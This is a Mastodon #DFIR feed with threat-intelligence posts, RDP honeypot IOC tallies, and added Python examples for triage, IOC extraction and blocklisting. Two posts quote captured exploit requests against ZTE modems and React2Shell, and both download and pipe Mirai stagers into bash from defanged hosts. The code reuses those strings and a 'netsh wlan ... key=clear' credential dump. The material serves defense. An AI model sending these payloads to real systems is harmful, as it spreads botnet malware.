#Dfir

2026-03-10

Belkasoft CEO Yuri Gubanov discusses the company's current line-up of products, how AI can be used in investigations, and the evolving challenges facing digital forensic investigators worldwide. forensicfocus.com/interviews/y #Belkasoft #DigitalForensics #DFIR #AI

Chris Sanders 🔎 🧠 (chrissanders88@infosec.exchange)
2026-03-10

Investigation Scenario 🔎

A host on your network executed the command “netsh wlan show profile” for the first time.

What do you look for to investigate whether an incident occurred?

#InvestigationPath #DFIR #SOC
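One way to work the scenario above, as an added example that is not part of Chris Sanders' post: a first-seen triage for "netsh wlan show profile" over constructed Windows process-creation records (fields modelled on Sysmon Event ID 1 / Security 4688). It reports the first execution per host that is not already baselined and gathers the context an analyst pivots on: the user, the parent process and whether it was an interactive shell, what ran next on the host, and whether a `key=clear` variant (cleartext Wi-Fi PSK dump) followed. The host names, users, timestamps and the baseline set are all assumed sample data.

```python
# Added example, not part of the original post: first-seen triage for
# "netsh wlan show profile" over constructed process-creation records.
import re
from dataclasses import dataclass
from datetime import datetime


@dataclass
class ProcEvent:
    ts: str        # ISO-8601 UTC timestamp
    host: str
    user: str
    parent: str    # parent image path
    image: str     # process image path
    cmdline: str


# Constructed sample records: WS-017 runs the command for the first time from an
# interactive cmd.exe and follows up with key=clear; WS-042 is a helpdesk host
# that is already in the baseline.
EVENTS = [
    ProcEvent("2026-03-10T09:12:03Z", "WS-017", "CORP\\jdoe",
              r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\netsh.exe",
              "netsh wlan show profile"),
    ProcEvent("2026-03-10T09:12:09Z", "WS-017", "CORP\\jdoe",
              r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\netsh.exe",
              'netsh wlan show profile name="CorpWiFi" key=clear'),
    ProcEvent("2026-03-10T09:12:15Z", "WS-017", "CORP\\jdoe",
              r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\whoami.exe",
              "whoami /all"),
    ProcEvent("2026-03-10T10:01:00Z", "WS-042", "CORP\\helpdesk",
              r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\netsh.exe",
              "netsh wlan show profile"),
]
# Assumed baseline: (host, technique key) pairs seen before the period under review.
BASELINE = {("WS-042", "netsh wlan show profile")}

TRIGGER = re.compile(r"^(?:.*\\)?netsh(?:\.exe)?\s+wlan\s+show\s+profiles?\b", re.I)
KEY_CLEAR = re.compile(r"key\s*=\s*clear", re.I)
INTERACTIVE_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe"}


def _norm(cmd: str) -> str:
    return " ".join(cmd.split()).lower()


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _ts(s: str) -> datetime:
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def triage(events, baseline, window_s=300):
    """Report the first 'netsh wlan show profile' per host not in the baseline,
    with user, parent, interactive-parent flag, follow-on command lines on the
    same host within window_s seconds, and whether key=clear followed."""
    events = sorted(events, key=lambda e: e.ts)
    seen = set(baseline)
    hits = []
    for i, ev in enumerate(events):
        if not TRIGGER.match(_norm(ev.cmdline)):
            continue
        key = (ev.host, "netsh wlan show profile")
        if key in seen:
            continue          # already baselined, or a repeat within this batch
        seen.add(key)
        t0 = _ts(ev.ts)
        follow = [e for e in events[i + 1:]
                  if e.host == ev.host
                  and 0 <= (_ts(e.ts) - t0).total_seconds() <= window_s]
        hits.append({
            "host": ev.host,
            "user": ev.user,
            "ts": ev.ts,
            "parent": ev.parent,
            "interactive_parent": _basename(ev.parent) in INTERACTIVE_PARENTS,
            "follow_on_cmdlines": [e.cmdline for e in follow],
            "key_clear_follow_up": any(KEY_CLEAR.search(e.cmdline) for e in follow),
        })
    return hits


if __name__ == "__main__":
    for hit in triage(EVENTS, BASELINE):
        print(hit)
```

The baseline is what makes "first time" meaningful: a helpdesk host that runs the command daily is noise, while a user workstation running it from an interactive shell and immediately asking for `key=clear` is a credential-access pattern worth escalating.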

2026-03-10

2026-03-09 RDP #Honeypot IOCs - 159 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
143.198.30.243 - 45
80.94.95.221 - 18
111.170.152.113 - 15

Top ASNs:
AS14061 - 45
AS396982 - 36
AS204428 - 18

Top Accounts:
hello - 63
Administr - 30
Test - 24

Top ISPs:
DigitalOcean, LLC - 45
Google LLC - 36
SS-Net - 18

Top Clients:
Unknown - 159

Top Software:
Unknown - 159

Top Keyboards:
Unknown - 159

Top IP Classification:
hosting - 87
Unknown - 66
mobile - 3

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

2026-03-10

2026-03-09 RDP #Honeypot IOCs - 106 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
143.198.30.243 - 30
80.94.95.221 - 12
111.170.152.113 - 10

Top ASNs:
AS14061 - 30
AS396982 - 24
AS204428 - 12

Top Accounts:
hello - 42
Administr - 20
Test - 16

Top ISPs:
DigitalOcean, LLC - 30
Google LLC - 24
SS-Net - 12

Top Clients:
Unknown - 106

Top Software:
Unknown - 106

Top Keyboards:
Unknown - 106

Top IP Classification:
hosting - 58
Unknown - 44
mobile - 2

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

2026-03-10

2026-03-09 RDP #Honeypot IOCs - 53 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
143.198.30.243 - 15
80.94.95.221 - 6
111.170.152.113 - 5

Top ASNs:
AS14061 - 15
AS396982 - 12
AS204428 - 6

Top Accounts:
hello - 21
Administr - 10
Test - 8

Top ISPs:
DigitalOcean, LLC - 15
Google LLC - 12
SS-Net - 6

Top Clients:
Unknown - 53

Top Software:
Unknown - 53

Top Keyboards:
Unknown - 53

Top IP Classification:
hosting - 29
Unknown - 22
mobile - 1

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

Cyber Tips Guide (cybertipsguide)
2026-03-09

New Huntress case study breaks down a MuddyWater-aligned (Iran) intrusion: RDP initial access, SSH tunneling with OpenSSH, & DLL side-loading via legitimate FMAPP.exe for C2. Great case study and walkthrough. 🔗zurl.co/AC8Re

172.245.21[.]30 is trying to exploit CVE-2014-2321, an RCE in ZTE F460 and F660 cable modems, with the command:
POST /web_shell_cmd.gch post_input IF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=wget+hXXp://107.172.79[.]248+ins/mips+-O+/var/tmp/init.norm&CmdAck="

Target 107.172.79[.]248 is currently rejecting connections

#malware #bot #dfir

43.228.157[.]64 is trying to exploit CVE-2025-55182 (React2Shell) to spread Mirai botnet malware with the command:
POST /api/action 443 posted 0={"_response":{"_formData":{"get":"$1:constructor:constructor"},"_prefix":"var+res+=+process.mainModule.require('child_process').execSync('wget+-qO+-+hXXp://83.142.209[.]47/x+|+bash;+curl+-sLk+hXXp://83.142.209[.]47/x+|+bash',{timeout:5000}).toString().trim();+throw+Object.assign(new+Error('NEXT_REDIRECT'),+{digest:`${res}`});"},"reason":-1,"status":"resolved_model","then":"$1:__proto__:then","value":"{\"then\":+\"$B0\"}"}&1="$@0""

hXXp://83.142.209[.]47/x is a bash script that downloads and executes Mirai variants for different architectures.

#malware #bot #dfir #mirai #react2shell
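For both captures above, as an added example that is not part of the posts: a small extractor that URL-decodes a captured request body and pulls out the second-stage download URLs, the fetch commands and whether the payload pipes straight into a shell. The two request strings are copied from the posts (defanged with hXXp and [.] exactly as posted); the regexes and the `refang` helper are this example's own and no network access is performed.

```python
# Added example, not part of the posts above: stage-2 IOC extraction from
# captured exploit requests. Request strings copied from the posts, defanged.
import re
from urllib.parse import unquote_plus

ZTE_REQUEST = ('POST /web_shell_cmd.gch post_input IF_ACTION=apply&IF_ERRORSTR=SUCC'
               '&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=wget+hXXp://107.172.79[.]248'
               '+ins/mips+-O+/var/tmp/init.norm&CmdAck="')

REACT_REQUEST = (
    r'POST /api/action 443 posted 0={"_response":{"_formData":{"get":"$1:constructor:constructor"},'
    r'"_prefix":"var+res+=+process.mainModule.require('
    r"'child_process').execSync('wget+-qO+-+hXXp://83.142.209[.]47/x+|+bash;"
    r"+curl+-sLk+hXXp://83.142.209[.]47/x+|+bash',{timeout:5000}).toString().trim();"
    r"+throw+Object.assign(new+Error('NEXT_REDIRECT'),+{digest:`${res}`});"
    r'"},"reason":-1,"status":"resolved_model","then":"$1:__proto__:then",'
    r'"value":"{\"then\":+\"$B0\"}"}&1="$@0"'
)

# Matches both live (http) and defanged (hXXp) URLs; stops at whitespace and
# shell/JSON delimiters so the trailing '|' or ',' is not swallowed.
URL = re.compile(r"h(?:xx|tt)ps?://[^\s'\"|;,)]+", re.I)
# A wget/curl invocation up to the next command separator or pipe.
FETCH = re.compile(r"\b(?:wget|curl)\b[^;|&`]*")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba)?sh\b")


def refang(url: str) -> str:
    """Turn a defanged URL back into a live one (for blocklists, not for fetching)."""
    return re.sub(r"^hxxp", "http", url, flags=re.I).replace("[.]", ".")


def extract_iocs(raw_request: str) -> dict:
    """Decode a form-encoded request ('+' is a space) and extract stager IOCs."""
    decoded = unquote_plus(raw_request)
    urls = []
    for u in URL.findall(decoded):
        if u not in urls:          # keep first-seen order, drop duplicates
            urls.append(u)
    return {
        "decoded": decoded,
        "urls": urls,
        "fetch_cmds": [c.strip() for c in FETCH.findall(decoded)],
        "pipes_to_shell": bool(PIPE_TO_SHELL.search(decoded)),
    }


if __name__ == "__main__":
    for name, req in (("ZTE", ZTE_REQUEST), ("React2Shell", REACT_REQUEST)):
        info = extract_iocs(req)
        print(name, info["urls"], info["pipes_to_shell"])
        for cmd in info["fetch_cmds"]:
            print("  ", cmd)
```

Decoding first matters: the React2Shell body arrives with `+` for spaces, so a regex run over the raw line would see `wget+-qO+-+hXXp://...` and miss the fetch. The `pipes_to_shell` flag separates a plain binary drop (the ZTE case writes to `/var/tmp/init.norm`) from a script piped straight into `bash`, which is the pattern that fans out to multiple architectures.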

2026-03-09

2026-03-08 RDP #Honeypot IOCs - 207 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
80.94.95.221 - 93
194.165.16.165 - 12
66.175.211.81 - 12

Top ASNs:
AS204428 - 93
AS396982 - 36
AS48721 - 12

Top Accounts:
Administr - 99
Domain - 27
Test - 18

Top ISPs:
SS-Net - 93
Google LLC - 36
Flyservers S.A. - 12

Top Clients:
Unknown - 207

Top Software:
Unknown - 207

Top Keyboards:
Unknown - 207

Top IP Classification:
Unknown - 138
hosting - 60
proxy - 9

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

2026-03-09

2026-03-08 RDP #Honeypot IOCs - 138 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
80.94.95.221 - 62
194.165.16.165 - 8
66.175.211.81 - 8

Top ASNs:
AS204428 - 62
AS396982 - 24
AS48721 - 8

Top Accounts:
Administr - 66
Domain - 18
Test - 12

Top ISPs:
SS-Net - 62
Google LLC - 24
Flyservers S.A. - 8

Top Clients:
Unknown - 138

Top Software:
Unknown - 138

Top Keyboards:
Unknown - 138

Top IP Classification:
Unknown - 92
hosting - 40
proxy - 6

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

2026-03-09

2026-03-08 RDP #Honeypot IOCs - 69 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
80.94.95.221 - 31
194.165.16.165 - 4
66.175.211.81 - 4

Top ASNs:
AS204428 - 31
AS396982 - 12
AS48721 - 4

Top Accounts:
Administr - 33
Domain - 9
Test - 6

Top ISPs:
SS-Net - 31
Google LLC - 12
Flyservers S.A. - 4

Top Clients:
Unknown - 69

Top Software:
Unknown - 69

Top Keyboards:
Unknown - 69

Top IP Classification:
Unknown - 46
hosting - 20
proxy - 3

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

Sajid Nawaz Khan :donor: (snkhan@infosec.exchange)
2026-03-08

If you’re a macOS user supporting Windows digital forensics, you’ll love IRFlow Timeline:

“A high-performance native macOS application for DFIR timeline analysis. Built on Electron + SQLite to handle large files for forensic timelines (CSV, TSV, XLSX, EVTX, Plaso) without breaking a sweat. Inspired by Eric Zimmerman's Timeline Explorer for Windows.”

github.com/r3nzsec/irflow-time

/cc @taylorparizo @timb_machine @tazwake @4enzikat0r #DFIR

2026-03-08

2026-03-07 RDP #Honeypot IOCs - 318 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
52.159.76.8 - 177
143.198.30.243 - 42
80.94.95.221 - 18

Top ASNs:
AS8075 - 177
AS14061 - 42
AS396982 - 36

Top Accounts:
hello - 228
Administr - 33
Test - 12

Top ISPs:
Microsoft Corporation - 177
DigitalOcean, LLC - 42
Google LLC - 36

Top Clients:
Unknown - 318

Top Software:
Unknown - 318

Top Keyboards:
Unknown - 318

Top IP Classification:
hosting - 258
Unknown - 48
proxy - 12

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

2026-03-08

2026-03-07 RDP #Honeypot IOCs - 212 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
52.159.76.8 - 118
143.198.30.243 - 28
80.94.95.221 - 12

Top ASNs:
AS8075 - 118
AS14061 - 28
AS396982 - 24

Top Accounts:
hello - 152
Administr - 22
Test - 8

Top ISPs:
Microsoft Corporation - 118
DigitalOcean, LLC - 28
Google LLC - 24

Top Clients:
Unknown - 212

Top Software:
Unknown - 212

Top Keyboards:
Unknown - 212

Top IP Classification:
hosting - 172
Unknown - 32
proxy - 8

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

2026-03-08

2026-03-07 RDP #Honeypot IOCs - 106 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
52.159.76.8 - 59
143.198.30.243 - 14
80.94.95.221 - 6

Top ASNs:
AS8075 - 59
AS14061 - 14
AS396982 - 12

Top Accounts:
hello - 76
Administr - 11
Test - 4

Top ISPs:
Microsoft Corporation - 59
DigitalOcean, LLC - 14
Google LLC - 12

Top Clients:
Unknown - 106

Top Software:
Unknown - 106

Top Keyboards:
Unknown - 106

Top IP Classification:
hosting - 86
Unknown - 16
proxy - 4

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

2026-03-07

2026-03-06 RDP #Honeypot IOCs - 204 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
71.6.134.235 - 30
42.193.196.87 - 21
2.57.121.22 - 15

Top ASNs:
AS396982 - 48
AS10439 - 30
AS45090 - 21

Top Accounts:
hello - 45
Administr - 36
Test - 27

Top ISPs:
Google LLC - 48
CariNet, Inc. - 30
China Internet Network Information Center - 21

Top Clients:
Unknown - 204

Top Software:
Unknown - 204

Top Keyboards:
Unknown - 204

Top IP Classification:
Unknown - 99
hosting - 69
hosting & proxy - 30

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

2026-03-07

2026-03-06 RDP #Honeypot IOCs - 136 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
71.6.134.235 - 20
42.193.196.87 - 14
2.57.121.22 - 10

Top ASNs:
AS396982 - 32
AS10439 - 20
AS45090 - 14

Top Accounts:
hello - 30
Administr - 24
Test - 18

Top ISPs:
Google LLC - 32
CariNet, Inc. - 20
China Internet Network Information Center - 14

Top Clients:
Unknown - 136

Top Software:
Unknown - 136

Top Keyboards:
Unknown - 136

Top IP Classification:
Unknown - 66
hosting - 46
hosting & proxy - 20

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

2026-03-07

2026-03-06 RDP #Honeypot IOCs - 68 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
71.6.134.235 - 10
42.193.196.87 - 7
2.57.121.22 - 5

Top ASNs:
AS396982 - 16
AS10439 - 10
AS45090 - 7

Top Accounts:
hello - 15
Administr - 12
Test - 9

Top ISPs:
Google LLC - 16
CariNet, Inc. - 10
China Internet Network Information Center - 7

Top Clients:
Unknown - 68

Top Software:
Unknown - 68

Top Keyboards:
Unknown - 68

Top IP Classification:
Unknown - 33
hosting - 23
hosting & proxy - 10

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security
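The daily honeypot posts above all share one layout, so as an added example (not code from the honeypot bot or its author) here is a parser for that format plus a cross-day aggregation that turns the per-post top-3 lists into a recurrence-scored blocklist. `SAMPLE_POSTS` is a subset copied from the posts in this thread (one post per date, Top IPs and Top ASNs only); the recurrence threshold and the scoring order are this example's own choices.

```python
# Added example, not part of the honeypot posts: parser and cross-day
# aggregation for the "RDP #Honeypot IOCs" post format.
import re
from collections import defaultdict

# Subset copied from the posts in this thread (Top IPs / Top ASNs only).
SAMPLE_POSTS = """\
2026-03-09 RDP #Honeypot IOCs - 159 scans

Top IPs:
143.198.30.243 - 45
80.94.95.221 - 18
111.170.152.113 - 15

Top ASNs:
AS14061 - 45
AS396982 - 36
AS204428 - 18

2026-03-08 RDP #Honeypot IOCs - 207 scans

Top IPs:
80.94.95.221 - 93
194.165.16.165 - 12
66.175.211.81 - 12

Top ASNs:
AS204428 - 93
AS396982 - 36
AS48721 - 12

2026-03-07 RDP #Honeypot IOCs - 318 scans

Top IPs:
52.159.76.8 - 177
143.198.30.243 - 42
80.94.95.221 - 18

Top ASNs:
AS8075 - 177
AS14061 - 42
AS396982 - 36

2026-03-06 RDP #Honeypot IOCs - 204 scans

Top IPs:
71.6.134.235 - 30
42.193.196.87 - 21
2.57.121.22 - 15

Top ASNs:
AS396982 - 48
AS10439 - 30
AS45090 - 21
"""

HEADER = re.compile(r"^(\d{4}-\d{2}-\d{2}) RDP #Honeypot IOCs - (\d+) scans$")
SECTION = re.compile(r"^Top (.+):$")
ENTRY = re.compile(r"^(.+?) - (\d+)$")


def parse_posts(text):
    """One dict per post: {"date", "scans", "sections": {name: [(label, count), ...]}}."""
    posts, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if m := HEADER.match(line):
            posts.append({"date": m.group(1), "scans": int(m.group(2)), "sections": {}})
            section = None
        elif (m := SECTION.match(line)) and posts:
            section = m.group(1)
            posts[-1]["sections"][section] = []
        elif (m := ENTRY.match(line)) and section is not None:
            posts[-1]["sections"][section].append((m.group(1), int(m.group(2))))
        else:
            section = None   # blank line, hashtags or the Pastebin error close a section
    return posts


def recurring(posts, section="IPs", min_days=2):
    """Labels seen on at least min_days distinct dates, with dates and summed hits."""
    days, hits = defaultdict(set), defaultdict(int)
    for p in posts:
        for label, n in p["sections"].get(section, []):
            days[label].add(p["date"])
            hits[label] += n
    return {label: {"days": sorted(days[label]), "hits": hits[label]}
            for label in days if len(days[label]) >= min_days}


def blocklist(posts, min_days=2):
    """IPs ordered by days seen, then summed hits, descending."""
    rec = recurring(posts, "IPs", min_days)
    return sorted(rec, key=lambda ip: (len(rec[ip]["days"]), rec[ip]["hits"]), reverse=True)


if __name__ == "__main__":
    parsed = parse_posts(SAMPLE_POSTS)
    print(blocklist(parsed))
    print(recurring(parsed, "ASNs", min_days=3))
```

Scoring by distinct days rather than raw hit count is deliberate: a single-day spike like 52.159.76.8 (177 hits on one date) is often one transient scanner, while 80.94.95.221 shows up on three consecutive days and AS396982 on all four, which is the persistence a blocklist should reward. Note that the thread carries several posts per date with proportionally scaled counts; this example keeps one post per date so hits are not triple-counted.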

Client Info

Server: https://mastodon.social
Version: 2025.07
Repository: https://github.com/cyevgeniy/lmst